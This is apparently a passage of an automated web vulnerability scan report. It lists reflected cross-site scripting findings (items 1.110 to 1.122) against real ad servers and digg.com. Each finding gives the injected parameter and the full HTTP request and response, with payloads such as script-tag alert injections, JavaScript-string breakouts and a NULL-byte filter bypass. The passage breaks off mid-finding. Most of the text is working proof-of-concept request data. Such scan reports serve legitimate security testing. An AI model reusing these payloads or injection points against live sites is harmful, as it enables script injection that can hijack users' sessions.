GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A04%3A02";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:50:42 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29672

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
te%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.110. http://control.adap.tv/control [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c9735<a>e3cf58f3e7c was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29817

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&catego
...[SNIP]...

1.111. http://control.adap.tv/control [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 2876f<a>6470f90d1d8 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A41";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:21 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.112. http://control.adap.tv/control [zid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the zid request parameter is copied into the HTML document as plain text between tags. The payload 8c414<a>3c1703c2f45 was submitted in the zid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A05";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:45 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 28091

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=t
...[SNIP]...

1.113. http://desk.opt.fimserve.com/adopt/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /adopt/

Issue detail

The value of the sz request parameter is copied into the HTML document as plain text between tags. The payload ac8d0<script>alert(1)</script>93bad1c92ea was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adopt/?r=j&l=f9dbaa88-1937-4ef0-a47d-978a82ed1bde&sz=160x600ac8d0<script>alert(1)</script>93bad1c92ea&neg=&ega=&puid=&rnd=4327672 HTTP/1.1
Host: desk.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJU1d4hWhIULOQ4E0Ag==; DMEXP=4; UI="297fc71db05673a122|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; TRG=; RTB=|2939.l.990305

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151
Date: Mon, 07 Mar 2011 01:50:03 GMT

_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='f9dbaa88-1937-4ef0-a47d-978a82ed1bde';
_sdc_sz='160x600ac8d0<script>alert(1)</script>93bad1c92ea';

1.114. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ab6a7"><script>alert(1)</script>c8b7f49b411 was submitted in the REST URL parameter 1. This input was echoed as ab6a7"><script>alert(1)</script>c8b7f49b411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00ab6a7"><script>alert(1)</script>c8b7f49b411 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-774891741542088704%3A191; expires=Wed, 09-Mar-2011 12:02:55 GMT; path=/; domain=digg.com
Set-Cookie: d=9559bdc74bb02ac1edfe251594ddebf2678bcd996a7b3bd18386a04e1bd90e01; expires=Sun, 07-Mar-2021 22:10:35 GMT; path=/; domain=.digg.com
X-Digg-Time: D=225552 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16716

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ab6a7"><script>alert(1)</script>c8b7f49b411.rss">
...[SNIP]...

1.115. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b1d"><script>alert(1)</script>f717e003dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/1379918009@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/951692678/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.116. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5de6"><script>alert(1)</script>3370aaa4e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/1379918009@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/240587422/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.117. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f9f"><script>alert(1)</script>40b55b3338d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1379918009@x2397f9f"><script>alert(1)</script>40b55b3338d HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/901202292/x2397f9f"><script>alert(1)</script>40b55b3338d/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aa96"-alert(1)-"766edfae151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1379918009@x23?3aa96"-alert(1)-"766edfae151=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2406
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="3aa96"-alert(1)-"766edfae151=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

1.119. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a8e"><script>alert(1)</script>030155edc73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/25748040/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><IM
...[SNIP]...

1.120. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cb7"><script>alert(1)</script>053f18afa9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/188151413/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.121. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158b"><script>alert(1)</script>159ab450cc2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/141706813@x23c158b"><script>alert(1)</script>159ab450cc2?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:37:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1967531099/x23c158b"><script>alert(1)</script>159ab450cc2/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><
...[SNIP]...

1.122. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of the USNetwork/Dell_Streak11Q1_Max_Demo_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ded7"-alert(1)-"8d231d38687 was submitted in the USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

